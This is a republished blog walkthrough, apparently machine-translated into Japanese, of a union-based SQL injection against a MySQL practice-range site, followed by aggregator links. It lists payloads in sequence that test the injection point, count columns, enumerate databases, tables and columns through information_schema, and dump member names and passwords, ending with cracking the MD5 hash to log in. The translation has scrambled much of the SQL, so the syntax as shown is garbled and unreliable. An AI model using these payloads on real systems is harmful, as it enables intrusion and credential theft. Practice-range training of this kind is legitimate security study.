80、SQLインジェクションの脆弱性テストマニュアル(MySQLデータベース)

その他 2019-08-25 23:23:48 訪問数: null

逐語https://www.dazhuanlan.com/2019/08/25/5d62593d1d0a1/


着陸発表の底部に入るまでスクロールし、ウェブページを訪問し、テスト注入点
?ID = 1及び正常,? ID = 1~1 = 1戻り、1 = 2 の注入点を示すエラーを返します。

?5クエリ列によってID = 1つの注文番号。通常のページに戻るまで、削減されている

?Idは= 1と1 = 2組合、1バージョン()、データベース()、4を選択したクエリのバージョンとデータベース名
(データベースですmozhe_Discuz_StormGroupを知るためにこの時間を)

?上記のid = 1と1組合の= 2 information_schema.schemataから1、SCHEMA_NAME、3,4選択限界0,1 limit0,1 1を使用してデータベースがスタートラインは0行目からデータをフェッチ示しクエリ。

?= 1、l = 2、ID information_schema.schemata限界から組合1を選択し、SCHEMA_NAME、3,4 1,1 クエリは1,1制限フェッチを使用してデータベースは、最初の行から開始ラインデータを示します。

?= 1、l = 2、ID information_schema.schemata限界から組合1を選択し、SCHEMA_NAME、3,4 2,1 クエリは2,1制限フェッチを使用してデータベース2行目からスタートラインデータを示します。

?ID = 1,1 = 2 information_schema.schemata限界から組合1を選択し、SCHEMA_NAME、3,4- 3,1 制限3,1を使用してクエリデータベースは、ラインデータから採取したスタートライン31を示しています。

?= 1、l = 2、ID information_schema.schemata限界から組合1を選択し、SCHEMA_NAME、3,4- 4,1 クエリデータベース、4,1ライン1 4からスタートラインデータを示す限定フェッチ使用。

?ID = 1,1 = 2組合1を選択し、TABLE_NAME、3,4- INFORMATION_SCHEMA.TABLESからTABLE_SCHEMA =「mozhe_Discuz_StormGroup」 名前テーブル限界0,1 mozhe_Discuz_StormGroupデータベースクエリ、ライン0からのデータの行をフェッチし
、この時点で(データベーステーブルStromGroup_member)を知っている

?上記ID = 1,1 = 2最初からWHERE INFORMATION_SCHEMA.TABLES TABLE_SCHEMA = 'mozhe_Discuz_StormGroup'限界1,1照会テーブル名mozhe_Discuz_StormGroupデータベースからユニオン1、TABLE_NAME、3、4のSELECT、ラインは、データの行をフェッチ

ID = 1?1 = 2組合1を選択し、TABLE_NAME、TABLE_SCHEMA =「mozhe_Discuz_StormGroup」制限INFORMATION_SCHEMA.TABLESから3,4 クエリ名2,1 mozhe_Discuz_StormGroupデータベーステーブルは、第二行から行をフェッチデータは、エラーがその2つだけのテーブルを示し、返されます。

?ID = 1,1 = 2組合1を選択し、 フィールドの内容は、COLUMN_NAME、information_schema.columnsからCOLUMN_TYPE、4 TABLE_NAME = 'StormGroup_member'リミット0,1 StormGroup_member照会テーブルは、ライン0からのデータの行をフェッチ

ID = 1?そして= 2組合1 1を選択し、 COLUMN_NAME、 'StormGroup_member' TABLE_NAME = information_schema.columnsからCOLUMN_TYPE、4 フィールドの内容は、1,1 StormGroup_member照会テーブルを制限するには、最初の行からデータの行をフェッチする。1

?= 1、ID = 2 1組合はCOLUMN_NAME、COLUMN_TYPE、1を選択し TABLE_NAME = 'StormGroup_member'制限information_schema.columnsから4 フィールドの内容StormGroup_member 2,1照会テーブル、ライン2から採取したデータの行

?= 1、ID = 2 1 1 SELECT連合、 information_schema.columnsからCOLUMN_NAME、COLUMN_TYPE、4 TABLE_NAME =「StormGroup_member」制限フィールドの内容StormGroup_member 3,1照会テーブルは3行目からデータの行をフェッチ

?ID = 1,1 = 2組合1を選択し、連結(名前、 ' - '、パスワード、 ' - '、ステータス)、mozhe_Discuz_StormGroup.StormGroup_member制限0,1から3,4は、 第0行の値を取得する

ID = 1および? 1 = 2組合1、連結選択し (、名前を' - '、パスワードを、 ' - '、ステータス)、mozhe_Discuz_StormGroup.StormGroup_memberから3,4 1,1を制限する最初の行の値を取得

ログインキーを取得するために、MD5が解読します。

おすすめ

転載: www.cnblogs.com/petewell/p/11408832.html
おすすめ
Arc Browser for Windows 1.0 が正式に提供開始
1990 年代生まれのプログラマーがビデオ移植ソフトウェアを開発し、1 年足らずで 700 万以上の利益を上げました。結末は非常に懲罰的でした。
ランキング
パフォーマンスプロファイラを実装する機能のようなCPPマクロ| C ++コードのパフォーマンステストを簡素化するためにマクロを使用する方法
クリック率を推定するための「特効薬」はありませんが、モデル構造よりも重要なことは何ですか?
Flink的重启策略(RestartStrategy)实战
Implementado en base a la tecnología de reconocimiento de huellas de voz Qualcomm SOC
Android custom encryption and decryption for playing audio and video (m3u8 independent encryption)
Oracleマルチテーブル結合クエリ、統計的合計、グループ化
MapReduceのワークフローと動作原理
ボタンを複数回押したときはどうすればサウンドのオーバーラップをすることができますか?
導出と理解SVM
Mac に Appium をインストールする
アーカイブ
もっと
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(35)
2024-04-29(5)
2024-04-28(12)
2024-04-27(29)
2024-04-26(22)
2024-04-25(31)
2024-04-24(30)

コードワールド

© 2018 codetd.com